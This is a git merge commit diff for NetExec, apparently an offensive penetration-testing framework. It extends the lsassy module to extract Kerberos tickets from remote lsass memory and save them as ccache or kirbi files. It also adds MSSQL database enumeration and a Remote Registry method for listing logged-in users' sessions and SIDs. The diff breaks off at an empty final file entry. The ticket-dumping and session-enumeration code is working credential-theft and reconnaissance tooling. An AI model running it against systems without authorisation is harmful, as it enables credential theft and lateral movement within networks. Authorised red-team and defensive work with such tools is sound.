Merge branch 'Pennyw0rth:main' into main

Kahvi-0 · web-flow · commit 4c4f3b99b973 · 2025-08-12T12:57:22.000-04:00
diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md
@@ -1,5 +1,3 @@
-# ❗❗❗ Before filing this bug report, MAKE SURE you have already downloaded the newest version of NetExec from GitHub and installed it! Many issues have already been reported and fixed, _especially_ if you are running the native Kali version! Please delete this line before submitting your issue if you have done so.❗❗❗
-
 ---
 name: Bug report
 about: Create a report to help us improve
@@ -9,6 +7,8 @@ assignees: ''
 
 ---
 
+# ❗❗❗ Before filing this bug report, MAKE SURE you have already downloaded the newest version of NetExec from GitHub and installed it! Many issues have already been reported and fixed, _especially_ if you are running the native Kali version! Please delete this line before submitting your issue if you have done so.❗❗❗
+
 
 
 **Describe the bug**
diff --git a/nxc/modules/lsassy.py b/nxc/modules/lsassy.py
@@ -4,12 +4,17 @@
 #  https://beta.hackndo.com [FR]
 #  https://en.hackndo.com [EN]
 
+import os
+import sys
 from lsassy.dumper import Dumper
 from lsassy.impacketfile import ImpacketFile
 from lsassy.parser import Parser
 from lsassy.session import Session
 
+from impacket.krb5.ccache import CCache
+
 from nxc.helpers.bloodhound import add_user_bh
+from nxc.paths import NXC_PATH
 
 
 class NXCModule:
@@ -21,13 +26,33 @@ def __init__(self, context=None, module_options=None):
         self.context = context
         self.module_options = module_options
         self.method = None
+        self.dump_tickets = True
+        self.save_dir = os.path.join(NXC_PATH, "modules", "lsassy")
+        self.ticket_type = "ccache"
 
     def options(self, context, module_options):
-        """METHOD              Method to use to dump lsass.exe with lsassy"""
+        """
+        METHOD              Method to use to dump lsass.exe with lsassy
+        DUMP_TICKETS        If set, will dump Kerberos tickets (Default: True)
+        SAVE_DIR            Directory to save dumped tickets
+        SAVE_TYPE           Type of ticket to save, either 'kirbi' or 'ccache' (Default: 'ccache')
+        """
         self.method = "comsvcs"
         if "METHOD" in module_options:
             self.method = module_options["METHOD"]
 
+        if "DUMP_TICKETS" in module_options:
+            self.dump_tickets = module_options["DUMP_TICKETS"].lower() in ["true"]
+
+        if "SAVE_DIR" in module_options:
+            self.save_dir = module_options["SAVE_DIR"]
+
+        if "SAVE_TYPE" in module_options:
+            self.ticket_type = module_options["SAVE_TYPE"]
+            if self.ticket_type not in ["kirbi", "ccache"]:
+                context.log.error(f"Invalid SAVE_TYPE '{self.ticket_type}'. Supported types are 'kirbi' and 'ccache'.")
+                sys.exit(1)
+
     def on_admin_login(self, context, connection):
         host = connection.host
         domain_name = connection.domain
@@ -67,7 +92,6 @@ def on_admin_login(self, context, connection):
             context.log.fail("Unable to parse lsass dump")
             return False
         credentials, tickets, masterkeys = parsed
-
         file.close()
         context.log.debug("Closed dumper file")
         file_path = file.get_file_path()
@@ -84,6 +108,9 @@ def on_admin_login(self, context, connection):
         if credentials is None:
             credentials = []
 
+        if self.dump_tickets and tickets:
+            self.write_tickets(context, tickets, host)
+
         for cred in credentials:
             c = cred.get_object()
             context.log.debug(f"Cred: {c}")
@@ -116,6 +143,52 @@ def on_admin_login(self, context, connection):
         context.log.debug("Calling process_credentials")
         self.process_credentials(context, connection, credentials_output)
 
+    def write_tickets(self, context, tickets, host):
+        if not tickets:
+            context.log.display("No Kerberos tickets found")
+            return
+
+        if not os.path.exists(self.save_dir):
+            try:
+                os.makedirs(self.save_dir)
+                context.log.debug(f"Created directory: {self.save_dir} for saving tickets")
+            except Exception as e:
+                context.log.fail(f"Error creating directory {self.save_dir}: {e}")
+                return
+
+        ticket_count = 0
+        for ticket in tickets:
+            for filename in ticket.kirbi_data:
+                try:
+                    base_filename = filename.split(".kirbi")[0]
+                    timestamp = ticket.EndTime.strftime("%Y%m%d%H%M%S")
+                    kirbi_data = ticket.kirbi_data[filename]
+
+                    if self.ticket_type == "ccache":
+                        ccache = CCache()
+                        ccache.fromKRBCRED(kirbi_data.dump())
+                        ticket_filename = f"{base_filename}_{host}_{timestamp}.ccache"
+                        ticket_content = ccache.getData()
+                    else:
+                        ticket_filename = f"{base_filename}_{host}_{timestamp}.kirbi"
+                        ticket_content = kirbi_data.dump()
+
+                    ticket_path = os.path.join(self.save_dir, ticket_filename)
+
+                    with open(ticket_path, "wb") as f:
+                        f.write(ticket_content)
+
+                    ticket_count += 1
+                    context.log.debug(f"Saved ticket: {ticket_filename}")
+
+                except Exception as e:
+                    context.log.fail(f"Error writing ticket {filename}: {e}")
+
+        if ticket_count > 0:
+            context.log.highlight(f"Saved {ticket_count} Kerberos ticket(s) to {self.save_dir}")
+        else:
+            context.log.display("No tickets were saved")
+
     def process_credentials(self, context, connection, credentials):
         if len(credentials) == 0:
             context.log.display("No credentials found")
diff --git a/nxc/protocols/mssql.py b/nxc/protocols/mssql.py
@@ -435,3 +435,74 @@ def rid_brute(self, max_rid=None):
 
             so_far += simultaneous
         return entries
+
+    def _qname(self, ident: str) -> str:
+        if ident is None:
+            return "[]"
+        return "[" + str(ident).replace("]", "]]") + "]"
+
+    def list_databases(self):
+        try:
+            q = (
+                "SELECT d.name AS DatabaseName, "
+                "       suser_sname(d.owner_sid) AS Owner "
+                "FROM sys.databases d "
+                "ORDER BY d.name;"
+            )
+            rows = self.conn.sql_query(q) or []
+            if not rows:
+                self.logger.display("No databases returned")
+                return
+
+            self.logger.display("Enumerated databases")
+            self.logger.highlight(f"{'Database Name':<30} {'Owner':<25}")
+            self.logger.highlight(f"{'-' * 30} {'-' * 25}")
+            for r in rows:
+                self.logger.highlight(f"{r.get('DatabaseName', ''):<30} {r.get('Owner', ''):<25}")
+            self.logger.highlight(f"Total: {len(rows)} database(s)")
+        except Exception as e:
+            self.logger.fail(f"Failed to enumerate databases: {e}")
+            self.logger.debug("list_databases error", exc_info=True)
+
+    def database(self):
+        db_arg = self.args.database
+
+        # nxc --database (no value) -> list
+        if db_arg is True or db_arg is None:
+            self.list_databases()
+            return
+
+        # nxc --database <name> -> tables
+        if isinstance(db_arg, str):
+            try:
+                safe = db_arg.replace("'", "''")
+                exists = self.conn.sql_query(f"SELECT 1 FROM sys.databases WHERE name = N'{safe}';")
+                if not exists:
+                    self.logger.fail(f"Database [{db_arg}] does not exist on the server.")
+                    return
+
+                tq = (
+                    f"SELECT t.name AS TableName, t.modify_date "
+                    f"FROM {self._qname(db_arg)}.sys.tables t "
+                    f"ORDER BY t.name;"
+                )
+                rows = self.conn.sql_query(tq) or []
+            except Exception as e:
+                self.logger.fail(f"Insufficient permissions or query error in [{db_arg}]: {e}")
+                self.logger.debug("database() error", exc_info=True)
+                return
+
+            if not rows:
+                self.logger.display(f"Database [{db_arg}] has no user tables.")
+                return
+
+            self.logger.display(f"Tables in database: {db_arg}")
+            self.logger.highlight(f"{'Table Name':<50} {'Last Modified':<25}")
+            self.logger.highlight(f"{'-' * 50} {'-' * 25}")
+            for r in rows:
+                mod = r.get("modify_date", "")
+                if mod and hasattr(mod, "strftime"):
+                    mod = mod.strftime("%Y-%m-%d %H:%M:%S")
+                self.logger.highlight(f"{r.get('TableName', ''):<50} {mod!s:<25}")
+            self.logger.highlight(f"Total: {len(rows)} table(s)")
+            return
diff --git a/nxc/protocols/mssql/proto_args.py b/nxc/protocols/mssql/proto_args.py
@@ -6,7 +6,8 @@ def proto_args(parser, parents):
     mssql_parser.add_argument("-H", "--hash", metavar="HASH", dest="hash", nargs="+", default=[], help="NTLM hash(es) or file(s) containing NTLM hashes")
     mssql_parser.add_argument("--port", default=1433, type=int, metavar="PORT", help="MSSQL port")
     mssql_parser.add_argument("--mssql-timeout", help="SQL server connection timeout", type=int, default=5)
-    mssql_parser.add_argument("-q", "--query", dest="mssql_query", metavar="QUERY", type=str, help="execute the specified query against the MSSQL DB")
+    mssql_parser.add_argument("-q", "--query", dest="mssql_query", metavar="QUERY", type=str, help="execute the specified query against the mssql db")
+    mssql_parser.add_argument("--database", nargs="?", const=True, metavar="NAME", help="list databases or list tables for NAME")
 
     dgroup = mssql_parser.add_mutually_exclusive_group()
     dgroup.add_argument("-d", metavar="DOMAIN", dest="domain", type=str, help="domain name")
diff --git a/nxc/protocols/smb.py b/nxc/protocols/smb.py
@@ -63,7 +63,7 @@
 from dploot.lib.target import Target
 from dploot.triage.sccm import SCCMTriage, SCCMCred, SCCMSecret, SCCMCollection
 
-from time import time, ctime
+from time import time, ctime, sleep
 from traceback import format_exc
 from termcolor import colored
 import contextlib
@@ -1149,6 +1149,147 @@ def format_row(procInfo):
         except SessionError:
             self.logger.fail("Cannot list remote tasks, RDP is probably disabled.")
 
+    def reg_sessions(self):
+
+        def output(sessions):
+            if sessions:
+                # Calculate max lengths for formatting
+                maxSidLen = max(len(key) + 1 for key in sessions)
+                maxSidLen = max(maxSidLen, len("SID") + 1)
+                maxUsernameLen = max(len(vals["Username"] + vals["Domain"]) + 1 for vals in sessions.values()) + 1
+                maxUsernameLen = max(maxUsernameLen, len("USERNAME") + 1)
+
+                # Create the template for formatting
+                template = (f"{{USERNAME: <{maxUsernameLen}}} {{SID: <{maxSidLen}}}")
+
+                # Create headers
+                header = template.format(USERNAME="USERNAME", SID="SID")
+                header2 = template.replace(" <", "=<").format(USERNAME="", SID="")
+
+                # Store result
+                result = [header, header2]
+
+                for sid, vals in sessions.items():
+                    username = vals["Username"]
+                    domain = vals["Domain"]
+                    user_full = f"{domain}\\{username}" if username else ""
+
+                    row = template.format(USERNAME=user_full, SID=sid)
+                    result.append(row)
+
+                self.logger.success("Remote Registry enumerated sessions")
+                for row in result:
+                    self.logger.highlight(row)
+            else:
+                self.logger.info(f"No active session found for specified user(s) using the Remote Registry service on {self.hostname}.")
+
+        # Bind to the Remote Registry Pipe
+        rpctransport = transport.SMBTransport(self.conn.getRemoteName(), self.conn.getRemoteHost(), filename=r"\winreg", smb_connection=self.conn)
+        for binding_attempts in range(2, 0, -1):
+            dce = rpctransport.get_dce_rpc()
+            try:
+                dce.connect()
+                dce.bind(rrp.MSRPC_UUID_RRP)
+                break
+            except SessionError as e:
+                self.logger.debug(f"Could not bind to the Remote Registry on {self.hostname}: {e}")
+                if binding_attempts == 1:   # Last attempt
+                    self.logger.info(f"The Remote Registry service seems to be disabled on {self.hostname}.")
+                    return
+            # STATUS_PIPE_NOT_AVAILABLE : Waiting 1 second for the service to start (if idle and set to 'Automatic' startup type)
+            sleep(1)
+
+        # Open HKU hive
+        try:
+            resp = rrp.hOpenUsers(dce)
+        except DCERPCException as e:
+            if "rpc_s_access_denied" in str(e).lower():
+                self.logger.info(f"Access denied while enumerating session using the Remote Registry on {self.hostname}.")
+                return
+            else:
+                self.logger.fail(f"Exception connecting to RPC on {self.hostname}: {e}")
+        except Exception as e:
+            self.logger.fail(f"Exception connecting to RPC on {self.hostname}: {e}")
+
+        # Enumerate HKU subkeys and recover SIDs
+        sid_filter = "^S-1-.*\\d$"
+        exclude_sid = ["S-1-5-18", "S-1-5-19", "S-1-5-20"]
+
+        key_handle = resp["phKey"]
+        index = 1
+        sessions = {}
+
+        while True:
+            try:
+                resp = rrp.hBaseRegEnumKey(dce, key_handle, index)
+                sid = resp["lpNameOut"].rstrip("\0")
+                if re.match(sid_filter, sid) and sid not in exclude_sid:
+                    self.logger.info(f"User with SID {sid} is logged in on {self.hostname}")
+                    sessions.setdefault(sid, {"Username": "", "Domain": ""})
+                index += 1
+            except rrp.DCERPCSessionError as e:
+                if "ERROR_NO_MORE_ITEMS" in str(e):
+                    self.logger.debug(f"No more items found in HKU on {self.hostname}.")
+                    break
+                else:
+                    self.logger.fail(f"Error enumerating HKU subkeys on {self.hostname}: {e}")
+                    break
+
+        rrp.hBaseRegCloseKey(dce, key_handle)
+        dce.disconnect()
+
+        if not sessions:
+            self.logger.info(f"No sessions found via the Remote Registry service on {self.hostname}.")
+            return
+
+        # Bind to the LSARPC Pipe for SID resolution
+        rpctransport = transport.SMBTransport(self.conn.getRemoteName(), self.conn.getRemoteHost(), filename=r"\lsarpc", smb_connection=self.conn)
+        dce = rpctransport.get_dce_rpc()
+        try:
+            dce.connect()
+            dce.bind(lsat.MSRPC_UUID_LSAT)
+        except Exception as e:
+            self.logger.debug(f"Failed to connect to LSARPC for SID resolution on {self.hostname}: {e}")
+            output(sessions)
+            return
+
+        # Resolve SIDs with names
+        policy_handle = lsad.hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES)["PolicyHandle"]
+        try:
+            resp = lsat.hLsarLookupSids(dce, policy_handle, sessions.keys(), lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta)
+        except DCERPCException as e:
+            if str(e).find("STATUS_SOME_NOT_MAPPED") >= 0:
+                resp = e.get_packet()
+                self.logger.debug(f"Could not resolve some SIDs: {e}")
+            else:
+                resp = None
+                self.logger.debug(f"Could not resolve SID(s): {e}")
+
+        if resp:
+            for sid, item in zip(sessions.keys(), resp["TranslatedNames"]["Names"], strict=False):
+                if item["DomainIndex"] >= 0:
+                    sessions[sid]["Username"] = item["Name"]
+                    sessions[sid]["Domain"] = resp["ReferencedDomains"]["Domains"][item["DomainIndex"]]["Name"]
+
+        # Filter for usernames
+        if self.args.reg_sessions:
+            arg = self.args.reg_sessions
+            if os.path.isfile(arg):
+                with open(arg) as f:
+                    usernames = [line.strip().lower() for line in f if line.strip()]
+            else:
+                usernames = [arg.lower()]
+
+            filtered_sessions = {}
+            for sid, info in sessions.items():
+                if info["Username"].lower() not in usernames:
+                    continue
+                else:
+                    filtered_sessions[sid] = info
+            output(filtered_sessions)
+        else:
+            output(sessions)
+
     def shares(self):
         temp_dir = ntpath.normpath("\\" + gen_random_string())
         temp_file = ntpath.normpath("\\" + gen_random_string() + ".txt")
@@ -1370,7 +1511,7 @@ def get_dc_ips(self):
         return dc_ips
 
     def smb_sessions(self):
-        self.logger.fail("[REMOVED] Use option --qwinsta or --loggedon-users")
+        self.logger.fail("[REMOVED] Use option --reg-sessions --qwinsta or --loggedon-users")
         return
 
     def disks(self):
diff --git a/nxc/protocols/smb/proto_args.py b/nxc/protocols/smb/proto_args.py
